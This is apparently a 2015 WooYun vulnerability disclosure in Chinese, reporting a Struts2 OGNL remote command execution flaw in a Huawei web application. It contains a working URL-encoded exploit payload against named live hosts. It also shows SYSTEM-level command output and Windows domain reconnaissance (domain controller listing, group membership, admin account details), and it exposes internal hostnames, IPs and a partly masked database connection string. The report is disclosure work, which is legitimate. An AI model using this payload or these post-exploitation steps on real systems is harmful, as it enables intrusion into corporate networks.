华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)
漏洞概要
缺陷编号:
WooYun-2015-149850
漏洞标题: 华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)
相关厂商:
华为技术有限公司
漏洞作者:
猪猪侠
提交时间: 2015-10-27 15:42
公开时间: 2015-12-12 00:34
漏洞类型: 命令执行
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认
漏洞来源:
http://www.wooyun.org
Tags标签:
第三方框架
漏洞详情披露状态:
2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开
简要描述:
华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络 域环境)
在域环境内,SYSTEM权限,可内网渗透,影响大,考虑了半天,还是写中文的
利用域渗透技术
http://zone.wooyun.org/content/23396
详细说明:
#1 漏洞服务器
http://wdt-mx.huawei.com/sdtrp/project.action
http://119.145.15.78/sdtrp/project.action
漏洞证明:
#2 exp
http://wdt-mx.huawei.com
code 区域http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\
whoami
code 区域nt authority\system
code 区域ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE
Primary Dns Suffix . . . . . . . : china.huawei.com
code 区域arp -a
Interface: 10.88.178.105 --- 0xc
Internet Address Physical Address Type
10.88.178.1 00-00-5e-00-01-b2 dynamic
10.88.178.2 f8-4a-bf-5c-1d-0e dynamic
10.88.178.3 f8-4a-bf-5c-1b-fe dynamic
10.88.178.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
Interface: 10.88.72.91 --- 0xe
Internet Address Physical Address Type
10.88.72.1 00-00-5e-00-01-48 dynamic
10.88.72.2 f8-4a-bf-5c-1d-0d dynamic
10.88.72.3 f8-4a-bf-5c-1b-fd dynamic
10.88.72.5 00-25-9e-b0-db-44 dynamic
10.88.72.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
# 在域环境内,可内网渗透,影响非常大
code 区域net time /domain
Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34
code 区域Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data
Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:
Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:
域环境内:光域控制器都几百台,几十万人不是盖的
net group "Domain controllers" /domain
code 区域The request will be processed at a domain controller for domain china.huawei.com.
Group name Domain Controllers
Comment óò?D?ùóDóò?????÷
Members
-------------------------------------------------------------------------------
mask 区域*****$ BLR*****
*****$ BRA*****
*****$ CGK*****
*****$ DFW*****
*****$ DGG*****
*****$ DGG*****
*****$ HGH*****
*****$ HKG*****
*****$ ISB*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LGG*****
*****$ LHR*****
*****$ LOS*****
*****$ MSC*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ NKG*****
*****$ PEK*****
*****$ RUH*****
*****$ SIA*****
*****$ SJC*****
*****$ SZX*****
*****$ SZX*****
*****$ SZX*****
*****D02-DC$ *****
YYZAD02-DC$
The command completed successfully.
code 区域The request will be processed at a domain controller for domain china.huawei.com.
Group name IT-ITPL-DC-CD-w
Comment 云数据中心安全解决方案部
Members
-------------------------------------------------------------------------------
mask 区域***** d00*****
***** h00*****
***** h00*****
***** j00*****
***** l00*****
***** l00*****
***** l00*****
***** l00*****
***** o00*****
***** r90*****
***** s00*****
***** w00*****
***** w00*****
***** x00*****
***** y00*****
***** y90*****
***** z00*****
***** z00*****
*****0359515 *****
The command completed successfully.
# 终极BOSS
code 区域The request will be processed at a domain controller for domain china.huawei.com.
User name china-admin
Full Name
Comment 管理计算机(域)的内置帐户
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2015/10/17 16:04:55
Password expires Never
Password changeable 2015/10/17 16:04:55
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *MomAdministrators
*X86-ADMIN1 *X86-ADMIN2
*X86-ADMIN3
Global Group memberships *MOMadmins *Domain Admins
*Domain Users *Group Policy Creator
The command completed successfully.
# 审计监控系统的数据库
code 区域var strADOConn="
rovider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitorassword=********;Network Library=dbmssocn";
var oADOConn,oADOCommand,oADORecord;
var strServer,strTask,strStatus,strADOCommand;
var oArgs;
var iAffected;
修复方案:
# 更新
版权声明:转载请注明来源
猪猪侠@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-10-28 00:32
厂商回复:感谢猪猪侠提醒,已通知业务进行修复。
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2015-0149850
搜索更多相关主题的帖子:
华为 远程命令执行 入侵内网
